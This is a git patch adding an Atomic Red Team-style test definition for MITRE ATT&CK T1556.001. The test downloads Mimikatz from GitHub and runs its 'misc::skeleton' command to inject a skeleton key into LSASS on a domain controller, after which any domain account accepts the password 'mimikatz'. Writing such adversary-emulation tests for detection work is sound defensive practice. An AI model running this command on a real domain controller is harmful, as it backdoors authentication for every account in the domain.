From 16ddc503401639ed9337e6799f421e658e8ca03e Mon Sep 17 00:00:00 2001
From: Dan Rogers <147435983+sp0r1um@users.noreply.github.com>
Date: Wed, 15 Apr 2026 21:08:04 -0600
Subject: [PATCH] Create new test - T1556.001 (#3310)

Co-authored-by: Hare Sudhan <27735081+cyberbuff@users.noreply.github.com>
---
 atomics/T1556.001/T1556.001.yaml | 46 ++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 atomics/T1556.001/T1556.001.yaml

diff --git a/atomics/T1556.001/T1556.001.yaml b/atomics/T1556.001/T1556.001.yaml
new file mode 100644
index 00000000..7d4ea86b
--- /dev/null
+++ b/atomics/T1556.001/T1556.001.yaml
@@ -0,0 +1,46 @@
+attack_technique: T1556.001
+display_name: 'Modify Authentication Process: Domain Controller Authentication'
+atomic_tests:
+- name: Skeleton Key via Mimikatz
+  description: |
+    Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+    user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+    This test must be run on an isolated domain controller and must not be performed on a production DC.
+    Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+  supported_platforms:
+    - windows
+  input_arguments:
+    mimikatz_path:
+      type: path
+      default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+      description: Path to the mimikatz executable
+    file_path:
+      type: path
+      default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+      description: File path where the zipped mimikatz file is downloaded to
+    mimikatz_url:
+      type: url
+      default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+      description: The URL for the mimikatz release zip
+    directory_path:
+      type: path
+      default: C:\ExternalPayloads\Mimikatz
+      description: Directory path for mimikatz
+  dependency_executor_name: powershell
+  dependencies:
+    - description: Mimikatz must be present on the host machine at #{mimikatz_path}
+      prereq_command: |
+        if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+      get_prereq_command: |
+        New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+        Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+        Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+  executor:
+    command: |
+      & "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+    cleanup_command: |
+      Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+      Restart-Computer -Force
+    name: powershell
+    elevation_required: true